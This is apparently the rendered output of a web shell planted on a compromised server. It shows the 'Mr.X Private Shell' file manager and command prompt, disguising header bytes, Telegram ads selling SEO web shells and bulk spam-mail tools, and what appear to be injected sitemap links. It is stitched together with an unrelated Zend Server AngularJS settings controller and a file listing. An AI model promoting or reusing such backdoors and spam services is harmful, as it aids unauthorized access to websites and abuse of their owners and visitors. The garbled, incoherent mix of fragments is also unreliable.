xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
zsApp.controller('DeploymentSettingsController', ['$scope', '$rootScope', '$timeout', 'WebAPI', function($scope, $rootScope, $timeout, WebAPI) {
	$scope.setHelpLinkSlug('deployment_settings');
	
	$scope.myForms = {};
	
	$scope.settings = {
		// directive value
		enableDeploymentWithoutRestart: '1',
		
		// loading
		initialLoadFinished: false,
		isAllowed: $scope.aclService.isAllowed('route:ConfigurationWebApi', 'configurationStoreDirectives'),
		
		load: function() {
			// error message in case of failure
			var errorMessage = 'Error loading current settings';
			
			WebAPI({
				method: 'GET',
				url: '/ZendServer/Api/configurationDirectivesList',
				params: {
					filter: 'zend_deployment.use_symlinks_for_conf' 
				}
			}).then(function(res) {
				if (res && res.data && res.data.responseData && res.data.responseData.directives) {
					$scope.settings.enableDeploymentWithoutRestart = res.data.responseData.directives[0].fileValue;
				} else {
					document.fireEvent('toastAlert', {message: errorMessage});
				}
			}, function(res) {
				if (typeof(res.data.errorData.errorMessage) != 'undefined') {
					errorMessage = res.data.errorData.errorMessage;
				}
				
				document.fireEvent('toastAlert', {message: errorMessage});
			}).finally(function() {
				$scope.settings.initialLoadFinished = true;
			});
		},
		
		// saving
		isSaving: false,
		save: function() {
			// error message in case of failure
			var errorMessage = 'Error saving settings';
			
			$scope.settings.isSaving = true;
			WebAPI({
				method: 'POST',
				url: '/ZendServer/Api/configurationStoreDirectives',
				data: {
					directives: {
						'zend_deployment.use_symlinks_for_conf': $scope.settings.enableDeploymentWithoutRestart
					}
				}
			}).then(function(res) {
				if (res && res.data && res.data.responseData && res.data.responseData.directives) {
					document.fireEvent('toastNotification', {message: 'Settings updated successfully'});
					
					// clear forms $dirty status
					if ($scope.myForms.deploymentSettings) { 
						$scope.myForms.deploymentSettings.$setPristine(); 
					}
				} else {
					document.fireEvent('toastAlert', {message: errorMessage});
				}
			}, function(res) {
				if (typeof(res.data.errorData.errorMessage) != 'undefined') {
					errorMessage = res.data.errorData.errorMessage;
				}
				
				document.fireEvent('toastAlert', {message: errorMessage});
			}).finally(function() {
				$scope.settings.isSaving = false;
			});
		},
	};
	
	// handle dirty exit
	// display a confirmation before leaving $dirty form
	$rootScope.$on('$stateChangeStart', function(event, toState, toParams, fromState, fromParams) {
		if ($scope.myForms.deploymentSettings && $scope.myForms.deploymentSettings.$dirty) {
			if (!confirm('Changes were made to the form. Leave the page anyway?')) {
				event.preventDefault();
				return;
			}
			
			// clear the $dirty flag of the form
			$scope.myForms.deploymentSettings.$setPristine();
		}
	});
	
	$scope.settings.load();
	
}]);

Filemanager

Name Type Size Permission Actions
applications.js File 46.22 KB 0644
deployment-wizard.js File 25.47 KB 0644
libraries.js File 29.77 KB 0644
settings.js File 2.93 KB 0644
vhost-manage-wizard.js File 2.66 KB 0644
vhost-wizard.js File 14.49 KB 0644
vhost.js File 27.81 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml